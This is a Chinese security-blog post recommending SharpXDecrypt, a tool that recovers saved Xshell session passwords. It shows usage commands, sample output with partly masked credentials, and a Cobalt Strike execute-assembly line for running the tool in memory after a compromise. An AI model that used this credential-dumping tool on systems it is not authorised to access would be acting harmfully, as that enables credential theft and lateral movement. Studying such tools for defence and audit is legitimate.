工具推荐——SharpDecryptPwd
2022-11-11 09:1:12 Author: 浪飒sec(查看原文) 阅读量:29 收藏

免责声明

本公众号所发布的文章及工具只限交流学习,本公众号不承担任何责任!如有侵权,请告知我们立即删除。

前言

上回发了工具推荐——SharpDecryptPwd,又发现了这个,这个是参考SharpDecryptPwd开发的另一个工具。

简介

Xshell全版本凭证一键恢复工具,针对Xshell全版本在本地保存的密码进行解密,包括最新的7系列版本。

项目地址

https://github.com/JDArmy/SharpXDecrypt

使用方法

cmd.exe 自动寻找session路径

C:\Users\asus\Desktop\DEV\SharpXDecrypt\bin\Debug> .\SharpXDecrypt.exe
Xshell全版本凭证一键导出工具!(支持最新Xshell 7系列版本!)Author: 0pen1Github: https://github.com/JDArmy[!] WARNING: For learning purposes only,please delete it within 24 hours after downloading!
[*] Start GetUserPath.... UserPath: E:\NetSarang Computer\xshell6 UserPath: C:\Users\asus\Documents\NetSarang Computer\7[*] Get UserPath Success !
[*] Start GetUserSID.... Username: asus userSID: S-1-5-21-736521517-423******97-1340300005-1001[*] GetUserSID Success !
XSHPath: E:\NetSarang Computer\xshell6\Xshell\Sessions\192.168.1.110.xsh Host: 192.168.1.110 UserName: wwwuser Password: www*******Aqx Version: 6.0
XSHPath: C:\Users\asus\Documents\NetSarang Computer\7\Xshell\Sessions\192.168.1.110.xsh Host: 192.168.1.110 UserName: wwwuser Password: ww********Aqx Version: 7.1
XSHPath: C:\Users\asus\Documents\NetSarang Computer\7\Xshell\Sessions\Tokyo.xsh Host: 198.13.51.134 UserName: root Password: W8*********PN__%  Version: 7.1

cmd.exe 指定session路径

C:\Users\asus\Desktop\DEV\SharpXDecrypt\bin\Release> .\SharpXDecrypt.exe "C:\Users\asus\Documents\NetSarang Computer\7\Xshell\Sessions"
Xshell全版本凭证一键导出工具!(支持Xshell 7.0+版本)Author: 0pen1Github: https://github.com/JDArmy[!] WARNING: For learning purposes only,please delete it within 24 hours after downloading!
[*] Start GetUserSID.... Username: asus userSID: S-1-5-21-736521517-4232353097-1340300005-1001[*] GetUserSID Success !
XSHPath: C:\Users\asus\Documents\NetSarang Computer\7\Xshell\Sessions\192.168.1.110.xsh Host: 192.168.1.110 UserName: wwwuser Password: www*******qx Version: 7.1
XSHPath: C:\Users\asus\Documents\NetSarang Computer\7\Xshell\Sessions\新建会话.xsh Host: 127.0.0.1 UserName: root Password: 78******6 Version: 7.1
[*] read done!

Cobalt Strike

execute-assembly /path/to/SharpXDecrypt.exeexecuteassembly /path/to/SharpXDecrypt.exe  "C:\Users\asus\Documents\NetSarang Computer\7\Xshell\Sessions"

获取

关注浪飒sec回复SharpXDecrypt获取快速下载地址

历史推荐

漏洞复现——php inclusion

漏洞复现——CVE-2017-5645

工具推荐——三个Burp插件

AK4安全工具集装箱V1.0.1正式发布

哈希碰撞与生日攻击

Ubuntu 20.04 离线安装破解 Nessus 10.3.0

浅析《数据安全法》与《个人信息保护法》对各行业的影响

内网渗透 域渗透

域环境基础知识

企业安全必看书籍(文末附地址)


文章来源: http://mp.weixin.qq.com/s?__biz=MzI1ODM1MjUxMQ==&mid=2247489911&idx=1&sn=01ec301b06d935faa9ee21ccee4f0ded&chksm=ea082d67dd7fa4719363021149fc913055e897939ea2b9494e9609bc370aa6fb9868d208bb4c#rd
如有侵权请联系:admin#unsafe.sh